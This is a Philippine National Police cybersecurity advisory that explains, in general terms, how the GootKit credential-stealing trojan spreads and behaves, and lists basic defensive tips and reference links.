MENU
AVP for Institutionalization 2018

DILG STRATEGIC DIRECTION AVP

ACG-CYBER SECURITY BULLETIN NO 124 UNDERSTANDING GOOTKIT MALWARE

The following information was obtained from different cyber security sources for notification to all parties concerned pursuant to the mandate of the Philippine National Police Anti-Cybercrime Group (PNP ACG).

The information provided was classified as “Restricted” pursuant to the PNP Regulation 200-012 on Document Security and Impact Rating as high based on PNP Information Communication Technology (ICT) Security Manual s.2010-01 p. 22 and p.129.

SUMMARY

GootKit is a JavaScript-based malware which uses web-injects, recording actions and utilizes a unique persistency mechanism in order to steal user credentials on infected machine. It also opens a backdoor and downloads additional files on the compromised computer.

This kind of Trojan comes in a form of a link in a spammed email message or may be downloaded or be spread silently through the use of web exploits.  Once it is executed, it creates an entry into the registry which runs every time a Windows system starts up, the malware recorded user actions when they are interacting with the login page, those recordings are assumed to be sent over email to the fraudster.

The Trojan acts as a botnet based on the command-and-control file and may perform an access to predetermined remote locations; download and execute files; gather confidential information; inject arbitrary JavaScript code into HTML files; list, start, stop and remove processes; list, create, modify and delete registry sub-keys; list, create, modify and delete files; modify content of FTP server; send mails; and upload files from the compromised computer.

GootKit can strike in a couple of different ways, either by infecting the PC or attacking the website.  The GootKit connects to web servers using stolen FTP/MYSql credentials and modify the HTML and PHP files with extra codes.  The GootKit host searches for thousands of PCs and look for server passwords, mail passwords, unencrypted FP and MySql passwords which it uses to compromise target servers.

GootKit’s overall prevalence in the wild is rather limited compared to other malware of its class. This is due to its operators keeping campaigns focused on a small number of countries.

 

RECOMMENDATION

All PNP personnel as well as the public are advised to follow the tips in order not to preventGootkit malware from infecting their devices and computer systems, to wit:

  • Don’t install or even run anything from an untrusted source;
  • Turn-off sharing if not necessary;
  • Always run updated anti-virus on your computers;
  • Disable autoplay to prevent automatic launching of executable files;
  • Always update your software with the latest patch available;
  • Regularly change the passwords for FTP accounts;
  • Say NO to unknown links and avoid downloading attachments from unrecognized sources; and
  • Always back up your data on an external device.

For additional information, please refer to the following websites:

  • https://www.symantec.com/security_response/writeup.jsp?docid=2010-051118-0604-99
  • http://www.virusradar.com/en/Win32_Gootkit.V/description
  • http://softflare.com/index.php?id=116
  • https://devcentral.f5.com/articles/gootkit-malware-new-targets-around-the-world-17867

POINT OF CONTACT

            Please contact PCINSP ANGELICA STARLIGHT L. RIVERA, Chief, Personnel Records Management Section thru e-mail address This email address is being protected from spambots. You need JavaScript enabled to view it. or contact us on telephone number (632) 7230401 local 3562 for any inquiries related to this CYBER SECURITY BULLETIN.